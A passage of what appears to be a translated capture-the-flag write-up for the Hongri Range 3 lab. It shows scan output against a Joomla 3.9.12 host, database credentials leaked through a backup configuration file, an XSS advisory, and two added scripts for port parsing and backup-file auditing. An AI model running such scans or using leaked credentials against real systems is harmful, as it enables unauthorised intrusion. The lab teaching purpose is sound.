Hongri Range 3 (红日靶场-3)

Contents

Preface

External penetration

External penetration: initial foothold

1. arp

2. nmap

3. nikto

4. whatweb

5. gobuster

6. dirsearch

CMS

1. Home page content

2. The /configuration.php~ path

3. The /administrator directory

4. Joomla!_version detection

5. joomlascan Python script

6. joomscan Perl script

MySQL

1. Remote login

2. Viewing sensitive data

Logging into the back end

1. Successful login

2. RCE vulnerability

AntSword (蚁剑) connection

1. Writing the shell

2. disable_functions bypass

SSH connection

Privilege escalation

Internal network penetration

Lateral movement 1

1. Generating the trojan file

2. Starting the listener

3. Adding an internal route

Lateral movement 2

1. Setting up the listener

2. Entering meterpreter

3. Adding an internal route

4. SOCKS5 proxy

1. The earthworm tunnelling tool

2. Configuring the proxychains4.conf file

5. Internal host discovery

1. First module

2. Second module

6. Internal attack

1. Password brute-forcing

2. The psexec tool

3. wmiexec.py

7. Getting the flag

Preface

In penetration testing, black-box testing and white-box testing are two common approaches used to evaluate the security and weaknesses of a target system. Their meaning and differences are as follows:

1. Black-box testing: black-box testing is carried out from an external perspective; the tester knows nothing about the internal structure or implementation details of the system under test. The tester treats the system as a black box, looking only at inputs and outputs without considering how it works internally. Black-box testing mainly checks the system's functionality, security vulnerabilities, configuration errors and so on. The tester plays the role of an external attacker and tries to discover potential vulnerabilities from the system's observable behaviour and interfaces.

2. White-box testing: white-box testing is carried out from an internal perspective; the tester has full knowledge of the system's internal structure, design and code. The tester can view and analyse internal details such as source code, configuration files and technical documentation. White-box testing mainly evaluates the system's structure, design, security implementation and code quality. The tester can use techniques such as static code analysis and code review to find potential vulnerabilities and security risks.

Black-box and white-box testing each have their own strengths and suitable scenarios. Black-box testing focuses more on the system's functionality and the user's point of view, and can simulate the behaviour of a real attacker. White-box testing focuses more on the system's internal security and code quality, and can analyse implementation details in depth to find hidden vulnerabilities. In real penetration tests the two approaches are usually combined so that the system's security is assessed comprehensively; potential vulnerabilities are then identified and fixed from different angles, improving the system's defences.

Lab setup

1. First add a VMnet2 network adapter with the subnet address 192.168.93.0.
2. Start the CentOS target and run "service network restart" to obtain an IP. CentOS has two adapters, one bridged and one on VMnet2; the former serves as its external IP and the latter as its internal IP.
3. CentOS is the only target that needs changing. The others must not be touched and must never be rebooted, because some of their services do not start automatically. If you need to shut down, suspend each target first.
4. Because a bridged adapter is used, the Kali attack machine's adapter must also be in bridged mode.
5. On CentOS run "ifconfig eth0" to check whether it obtained an IP; on Kali run "ip a" to check the same.
6. Finally, open the target in a browser to confirm that it can be reached.

192.168.93.10                 WIN-8GA56TNV3MV
192.168.93.20                 WIN2008
192.168.93.30                 WIN7
192.168.93.100  192.168.1.21  CentOS
192.168.93.120                Ubuntu
192.168.1.20                  Kali

This exercise is a black-box test, so we have no passwords. The goal is to obtain domain controller privileges and find the important files on it.

External penetration

External penetration: initial foothold

1. arp

┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.1.20
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     00:03:0f:2b:90:20       Digital China (Shanghai) Networks Ltd.
192.168.1.2     d4:8f:a2:9f:51:49       Huawei Device Co., Ltd.
192.168.1.6     3c:55:76:dc:ab:f5       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5     7c:b5:66:a5:f0:a5       Intel Corporate
192.168.1.14    7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.13    7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.21    00:0c:29:32:46:c9       VMware, Inc.
192.168.1.4     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.9     fa:f1:bf:c4:d1:1d (42:f1:e2:49:51:a5)   (Unknown: locally administered)
192.168.1.16    30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.18    30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.7     c4:75:ab:58:e4:8b (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.8     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.17    42:45:ab:5e:e9:ce (42:f1:e2:49:51:a5)   (Unknown: locally administered)

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 14 responded

2. nmap

Port scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.1.21 --min-rate 10000 -oA ports                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 12:06 CST
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds

How to extract the ports
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap                                                                                                  
# Nmap 7.94 scan initiated Fri Dec  1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
# Nmap done at Fri Dec  1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds

┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap | awk '{print($1)}' | head -n 8 | tail -n 3 | awk -F "/" '{print($1)}' | xargs -n3 | sed 's/ /,/g'
22,80,3306

This pipeline uses the awk, sed, head, tail and xargs commands.
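A more robust way to pull the open ports out of the report, as an added example that is not part of the original write-up: the head/tail pipeline above depends on the ports sitting on lines 6-8 of ports.nmap, whereas the functions below key on the "NNN/tcp open" lines of the .nmap file and on the "Ports:" field of the .gnmap file that -oA also writes, so closed or filtered ports are skipped however many there are. The two sample reports are constructed to mirror the scan above.

```shell
#!/bin/sh
# Extract open TCP ports from nmap output files for a follow-up "nmap -p" scan.
# Keys on the port entries themselves rather than on fixed line numbers, so the
# result is correct for any number of ports, and closed/filtered ones are skipped.
# Added example; the two sample reports below are constructed.

# Constructed normal-output (.nmap) report, with one filtered port added.
SAMPLE_NMAP='# Nmap 7.94 scan initiated Fri Dec  1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  filtered https
3306/tcp open     mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
# Nmap done at Fri Dec  1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds'

# Constructed greppable (.gnmap) report for the same scan; -oA writes this file too.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated Fri Dec  1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Host: 192.168.1.21 ()   Status: Up
Host: 192.168.1.21 ()   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/filtered/tcp//https///, 3306/open/tcp//mysql///   Ignored State: closed (65531)
# Nmap done at Fri Dec  1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds'

# Read a .nmap report on stdin; print the open TCP ports as "22,80,3306".
open_tcp_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
             split($1, p, "/")
             list = (list == "" ? "" : list ",") p[1]
         }
         END { print list }'
}

# Same for a .gnmap report: each entry of the "Ports:" field is
# port/state/proto/owner/service/rpc/version/, all on one line per host.
open_tcp_ports_gnmap() {
    sed -n 's/.*Ports: //p' | sed 's/[[:space:]]*Ignored State.*//' | tr ',' '\n' |
        awk -F/ '$2 == "open" && $3 == "tcp" {
                     sub(/^[[:space:]]+/, "", $1)
                     list = (list == "" ? "" : list ",") $1
                 }
                 END { print list }'
}

printf '%s\n' "$SAMPLE_NMAP"  | open_tcp_ports          # 22,80,3306
printf '%s\n' "$SAMPLE_GNMAP" | open_tcp_ports_gnmap    # 22,80,3306
```

Feed a real file with `open_tcp_ports < ports.nmap` or `open_tcp_ports_gnmap < ports.gnmap`.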

Service and version detection

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA XX
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:22 CST
Nmap scan report for 192.168.1.21
Host is up (0.00028s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
|   1024 25:84:c6:cc:2c:8a:7b:8f:4a:7c:60:f1:a3:c9:b0:22 (DSA)
|_  2048 58:d1:4c:59:2d:85:ae:07:69:24:0a:dd:72:0f:45:a5 (RSA)
80/tcp   open  http       nginx 1.9.4
|_http-title: 502 Bad Gateway
|_http-server-header: nginx/1.9.4
3306/tcp open  tcpwrapped
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 seconds

UDP scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.1.21 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:23 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
2/udp     closed compressnet
9000/udp  closed cslistener
16862/udp closed unknown
41971/udp closed unknown
46836/udp closed unknown
49185/udp closed unknown
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

Vulnerability scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 15:20 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
|   Found the following indications of potential DOM based XSS:
|
|     Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_    Pages: http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/index.php/6-your-template, http://192.168.1.21:80/index.php/5-your-modules, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php/4-about-your-home-page
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.1.21:80/
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/6-your-template
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/login
|     Form id: mod-search-searchword87
|     Form action: /index.php/login
|
|     Path: http://192.168.1.21:80/index.php/login
|     Form id: username-lbl
|     Form action: /index.php/login?task=user.login
|
|     Path: http://192.168.1.21:80/index.php/5-your-modules
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/author-login
|     Form id: mod-search-searchword87
|     Form action: /index.php/author-login
|
|     Path: http://192.168.1.21:80/index.php/author-login
|     Form id: username-lbl
|     Form action: /index.php/author-login?task=user.login
|
|     Path: http://192.168.1.21:80/index.php
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/4-about-your-home-page
|     Form id: mod-search-searchword87
|_    Form action: /index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /robots.txt: Robots file
|   /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
|   /language/en-GB/en-GB.xml: Joomla version 3.9.12
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 74.52 seconds

3. nikto

┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.1.21 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2023-12-01 15:19:50 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.9.4
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/libraries/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/modules/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cache/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/layouts/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/includes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/administrator/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cli/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/tmp/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/plugins/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/bin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/language/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/components/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 14 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8924 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2023-12-01 15:20:26 (GMT8) (36 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4. whatweb

┌──(root㉿ru)-[~/lianxi]
└─# whatweb -v http://192.168.1.21
WhatWeb report for http://192.168.1.21
Status    : 200 OK
Title     : Home
IP        : 192.168.1.21
Country   : RESERVED, ZZ

Summary   : Bootstrap, Cookies[d238a471ae12a7732425ae4995e23fce], HTML5, HTTPServer[nginx/1.9.4], HttpOnly[d238a471ae12a7732425ae4995e23fce], JQuery, MetaGenerator[Joomla! - Open Source Content Management], nginx[1.9.4], OpenSearch[http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch], Script

Detected Plugins:
[ Bootstrap ]
    Bootstrap is an open source toolkit for developing with HTML, CSS, and JS.
    Website     : https://getbootstrap.com/

[ Cookies ]
    Display the names of cookies in the HTTP headers. The values are not returned to save on space.
    String       : d238a471ae12a7732425ae4995e23fce

[ HTML5 ]
    HTML version 5, detected by the doctype declaration

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to identify the operating system from the server header.
    String       : nginx/1.9.4 (from server string)

[ HttpOnly ]
    If the HttpOnly flag is included in the HTTP set-cookie response header and the browser supports it then the cookie cannot be accessed through client side script - More Info: http://en.wikipedia.org/wiki/HTTP_cookie
    String       : d238a471ae12a7732425ae4995e23fce

[ JQuery ]
    A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX.
    Website     : http://jquery.com/

[ MetaGenerator ]
    This plugin identifies meta generator tags and extracts its value.
    String       : Joomla! - Open Source Content Management

[ OpenSearch ]
    This plugin identifies open search and extracts the URL. OpenSearch is a collection of simple formats for the sharing of search results.
    String       : http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch

[ Script ]
    This plugin detects instances of script HTML elements and returns the script language/type.

[ nginx ]
    Nginx (Engine-X) is a free, open-source, high-performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server.
    Version      : 1.9.4
    Website     : http://nginx.net/

HTTP Headers:
    HTTP/1.1 200 OK
    Server: nginx/1.9.4
    Date: Mon, 07 Oct 2019 08:29:39 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 4001
    Connection: close
    Set-Cookie: d238a471ae12a7732425ae4995e23fce=r8kse6ihf5gjio9jiuegcd1qvj; path=/; HttpOnly
    Expires: Wed, 17 Aug 2005 00:00:00 GMT
    Last-Modified: Fri, 01 Dec 2023 07:23:51 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip

5. gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.1.21 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.21
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 313] [--> http://192.168.1.21/images/]
/media                (Status: 301) [Size: 312] [--> http://192.168.1.21/media/]
/templates            (Status: 301) [Size: 316] [--> http://192.168.1.21/templates/]
/modules              (Status: 301) [Size: 314] [--> http://192.168.1.21/modules/]
/bin                  (Status: 301) [Size: 310] [--> http://192.168.1.21/bin/]
/plugins              (Status: 301) [Size: 314] [--> http://192.168.1.21/plugins/]
/includes             (Status: 301) [Size: 315] [--> http://192.168.1.21/includes/]
/language             (Status: 301) [Size: 315] [--> http://192.168.1.21/language/]
/components           (Status: 301) [Size: 317] [--> http://192.168.1.21/components/]
/cache                (Status: 301) [Size: 312] [--> http://192.168.1.21/cache/]
/libraries            (Status: 301) [Size: 316] [--> http://192.168.1.21/libraries/]
/tmp                  (Status: 301) [Size: 310] [--> http://192.168.1.21/tmp/]
/layouts              (Status: 301) [Size: 314] [--> http://192.168.1.21/layouts/]
/administrator        (Status: 301) [Size: 320] [--> http://192.168.1.21/administrator/]
/cli                  (Status: 301) [Size: 310] [--> http://192.168.1.21/cli/]

6. dirsearch

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.1.21 -e*

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/.dirsearch/reports/192.168.1.21/_23-12-01_15-26-31.txt

Error Log: /root/.dirsearch/logs/errors-23-12-01_15-26-31.log

Target: http://192.168.1.21/

[15:26:31] Starting:
[15:26:50] 200 -   18KB - /LICENSE.txt
[15:26:50] 200 -    5KB - /README.txt
[15:26:59] 403 -  277B  - /administrator/.htaccess
[15:26:59] 301 -  320B  - /administrator  ->  http://192.168.1.21/administrator/
[15:26:59] 200 -    5KB - /administrator/
[15:26:59] 200 -    2KB - /administrator/includes/
[15:26:59] 200 -   31B  - /administrator/cache/
[15:26:59] 200 -    5KB - /administrator/index.php
[15:26:59] 301 -  325B  - /administrator/logs  ->  http://192.168.1.21/administrator/logs/
[15:26:59] 200 -   31B  - /administrator/logs/
[15:27:02] 301 -  310B  - /bin  ->  http://192.168.1.21/bin/
[15:27:02] 200 -   31B  - /bin/
[15:27:03] 301 -  312B  - /cache  ->  http://192.168.1.21/cache/
[15:27:03] 200 -   31B  - /cache/
[15:27:04] 200 -   31B  - /cli/
[15:27:04] 301 -  317B  - /components  ->  http://192.168.1.21/components/
[15:27:04] 200 -   31B  - /components/
[15:27:05] 200 -    0B  - /configuration.php
[15:27:05] 200 -    2KB - /configuration.php~
[15:27:10] 200 -    3KB - /htaccess.txt
[15:27:11] 301 -  313B  - /images  ->  http://192.168.1.21/images/
[15:27:11] 200 -   31B  - /images/
[15:27:11] 301 -  315B  - /includes  ->  http://192.168.1.21/includes/
[15:27:11] 200 -   31B  - /includes/
[15:27:11] 200 -   16KB - /index.php
[15:27:11] 200 -    9KB - /index.php/login/
[15:27:13] 301 -  315B  - /language  ->  http://192.168.1.21/language/
[15:27:13] 200 -   31B  - /layouts/
[15:27:13] 301 -  316B  - /libraries  ->  http://192.168.1.21/libraries/
[15:27:13] 200 -   31B  - /libraries/
[15:27:15] 301 -  312B  - /media  ->  http://192.168.1.21/media/
[15:27:15] 200 -   31B  - /media/
[15:27:16] 301 -  314B  - /modules  ->  http://192.168.1.21/modules/
[15:27:16] 200 -   31B  - /modules/
[15:27:20] 200 -   31B  - /plugins/
[15:27:21] 301 -  314B  - /plugins  ->  http://192.168.1.21/plugins/
[15:27:23] 200 -  829B  - /robots.txt
[15:27:24] 403 -  277B  - /server-status
[15:27:24] 403 -  277B  - /server-status/
[15:27:28] 301 -  316B  - /templates  ->  http://192.168.1.21/templates/
[15:27:28] 200 -   31B  - /templates/
[15:27:28] 200 -   31B  - /templates/index.html
[15:27:28] 200 -    0B  - /templates/protostar/
[15:27:28] 200 -    0B  - /templates/system/
[15:27:28] 200 -    0B  - /templates/beez3/
[15:27:30] 301 -  310B  - /tmp  ->  http://192.168.1.21/tmp/
[15:27:30] 200 -   31B  - /tmp/
[15:27:35] 200 -    2KB - /web.config.txt

CMS

1. Home page content

The home page is just some blog content. After exploring it, no exploitable point was found.

According to the hint, the site uses the Protostar template.

Probing shows that different content can be reached through this id number, but it seems to go no higher than 6.

2. The /configuration.php~ path

Through directory enumeration we found the site's configuration file, and with it the database account and password.

Account: testuser
Password: cvcvgjASD!@
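The defender-side check this finding calls for, as an added example that is not the write-up's own code: configuration.php itself came back as 0 bytes because the server executed it as PHP, but the editor backup configuration.php~ no longer matches the PHP handler and is served as plain text, which is why the credentials leaked. The script audits a web root for such leftover copies and flags those that contain the database properties of Joomla's JConfig class ($user, $password, $host, $db); the sample tree and its password value are constructed.

```shell
#!/bin/sh
# Audit a web root for leftover editor backups / stray copies of files. A file
# named configuration.php~ (or .bak, .orig, ...) no longer matches the PHP
# handler, so the web server returns its source, credentials included.
# Added example; the sample tree and all values in it are constructed.

# List backup/temporary copies under $1 that a web server would serve verbatim.
find_exposed_backups() {
    find "$1" -type f \( -name '*~' -o -name '*.bak' -o -name '*.orig' \
        -o -name '*.old' -o -name '*.save' -o -name '*.swp' \) | sort
}

# Classify one hit: CREDENTIALS if it carries the database properties of
# Joomla's JConfig class ($user, $password, $host, $db), otherwise "source".
classify_backup() {
    if grep -Eq '^[[:space:]]*public \$(user|password|host|db)[[:space:]]*=' "$1"; then
        echo CREDENTIALS
    else
        echo source
    fi
}

# Print "<class><TAB><path relative to web root>" for every exposed copy.
audit_webroot() {
    find_exposed_backups "$1" | while IFS= read -r f; do
        printf '%s\t%s\n' "$(classify_backup "$f")" "${f#"$1"/}"
    done
}

# Build a constructed Joomla-like web root with one real config, its editor
# backup, and an unrelated template backup; prints the directory path.
build_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/templates/protostar"
    cat > "$root/configuration.php" <<'EOF'
<?php
class JConfig {
    public $user = 'testuser';
    public $password = 'constructed-example-password';
    public $db = 'joomla';
    public $host = 'localhost';
}
EOF
    cp "$root/configuration.php" "$root/configuration.php~"    # editor backup
    printf '<?php echo "template";\n' > "$root/templates/protostar/index.php.bak"
    echo "$root"
}

root=$(build_sample_webroot)
audit_webroot "$root"   # CREDENTIALS configuration.php~ / source templates/protostar/index.php.bak
rm -rf "$root"
```

Run `audit_webroot /path/to/webroot` against a real deployment; anything reported should be deleted from the web root or blocked by the web server's location rules.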

3. The /administrator directory

It really is Joomla!; on to the next round of probing.

4. Joomla!_version detection

We can use the auxiliary module in msf to scan for the version.

msf6 > search Joomla_version

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/joomla_version                   normal  No     Joomla Version Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/joomla_version

msf6 >

msf6 > use 0
msf6 auxiliary(scanner/http/joomla_version) > show options

Module options (auxiliary/scanner/http/joomla_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the Joomla application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.1.21
rhosts => 192.168.1.21
msf6 auxiliary(scanner/http/joomla_version) > exploit

[*] Server: nginx/1.9.4
[+] Joomla version: 3.9.12
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The scan shows the CMS version is 3.9.12, so we can now look up the matching exploits.

┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Joomla 3.9.12
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting   | php/webapps/43488.txt
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 43488.txt
  Exploit: Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting
      URL: https://www.exploit-db.com/exploits/43488
     Path: /usr/share/exploitdb/exploits/php/webapps/43488.txt
    Codes: CVE-2018-5263
 Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /root/lianxi/43488.txt

┌──(root㉿ru)-[~/lianxi]
└─# ls
43488.txt  ports.gnmap  ports.nmap  ports.xml  port.txt  udp.gnmap  udp.nmap  udp.xml  vuln.gnmap  vuln.nmap  vuln.xml  whatweb.txt  XX.gnmap  XX.nmap  XX.xml

┌──(root㉿ru)-[~/lianxi]
└─# cat 43488.txt
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps

1. Description

Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user's browser. Works with every version up to 4.0.20

2. Proof of Concept

Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed

3. Solution:

Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update


We found the matching exploit, but these vulnerabilities all require administrator privileges, so we need to probe further.

5. joomlascan Python script

┌──(root㉿ru)-[~/tools/JoomlaScan]
└─# python2 joomlascan.py -u http://192.168.1.21 -t 5   
-------------------------------------------
Joomla Scan                  Usage: python joomlascan.py <target>
Version 0.5beta - Database Entries 1235
created by Andrea Draghetti
-------------------------------------------
Robots file found:               > http://192.168.1.21/robots.txt
No Error Log found

Start scan...with 10 concurrent threads!
Component found: com_actionlogs  > http://192.168.1.21/index.php?option=com_actionlogs
    On the administrator components
